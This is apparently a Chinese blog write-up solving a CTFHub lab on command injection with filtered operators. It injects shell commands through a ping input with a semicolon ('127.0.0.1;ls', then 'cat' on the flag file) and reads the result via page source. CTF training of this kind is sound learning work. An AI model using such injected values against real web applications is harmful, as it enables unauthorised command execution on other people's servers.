CTFHub-RCE 命令注入-过滤运算符

FGHua_kk2025-06-04 16:15

观察源代码

  • 代码里面可以发现过滤了运算符,我们可以尝试分号;

判断是Windows还是Linux

  • 源代码中有

    php 复制代码 
    ping -c 4

    说明是Linux

查看有哪些文件

复制代码 
```php
127.0.0.1;ls
```

打开flag文件

  • cat这个php文件
复制代码 
```php
127.0.0.1;cat  flag_257413168915334.php
```
  • 可是发现 文本内容显示不出来,所以怀疑可能编码格式问题,有些内容无法显示(同上一节)
  • 由于过滤了运算符|,我们不能尝试用base64编码,但是可以打开网页源代码查看(Ctrl+U)
  • 成功获取flag
相关推荐
聚铭网络11 小时前
案例精选 | 南京交通职业技术学院安全运营服务建设标杆
网络安全
小楓120115 小时前
Web漏洞挖掘篇(二)—信息收集
web安全·网络安全·漏洞挖掘
vortex517 小时前
AD渗透中服务账号相关攻击手法总结(Kerberoasting、委派)
windows·网络安全·渗透测试·ad
久绊A1 天前
如何在Kali Linux官网下载历史版本
安全·web安全
李白你好1 天前
功能强大的多线程端口扫描工具,支持批量 IP 扫描、多种端口格式输入、扫描结果美化导出,适用于网络安全检测与端口监控场景
web安全
Bruce_Liuxiaowei1 天前
Linux系统提权之计划任务(Cron Jobs)提权
linux·运维·服务器·网络安全·系统安全
筑梦之月2 天前
3分钟解决ZAP打开浏览器闪退问题
web安全
m0_738120722 天前
CTFshow系列——PHP特性Web93-96
开发语言·安全·web安全·php·ctfshow
Suckerbin2 天前
DarkHole: 2靶场渗透
笔记·安全·web安全·网络安全
lingggggaaaa2 天前
小迪安全v2023学习笔记(七十八讲)—— 数据库安全&Redis&CouchDB&H2database&未授权&CVE
redis·笔记·学习·算法·安全·网络安全·couchdb
热门推荐
012025 年高教社杯全国大学生数学建模竞赛C 题 NIPT 的时点选择与胎儿的异常判定 完整成品思路模型代码分享,全网首发高质量!!!022025年数学建模国赛C题超详细解题思路032025全国大学生数学建模C题保姆级思路模型(持续更新):NIPT 的时点选择与胎儿的异常判定042025高教社杯国赛数学建模选题建议+初步分析05不再让Windows更新!&Edge游戏助手卸载及关闭自动更新06UV安装并设置国内源072025国赛B题保姆级教程思路分析 碳化硅外延层厚度的确定08KGG转MP3工具|非KGM文件|解密音频09奈飞工厂官网,国内Netflix影视在线看|中文网页电脑版入口10(E题|AI 辅助智能体测)2025年高教杯全国大学生数学建模国赛解题思路|完整代码论文集合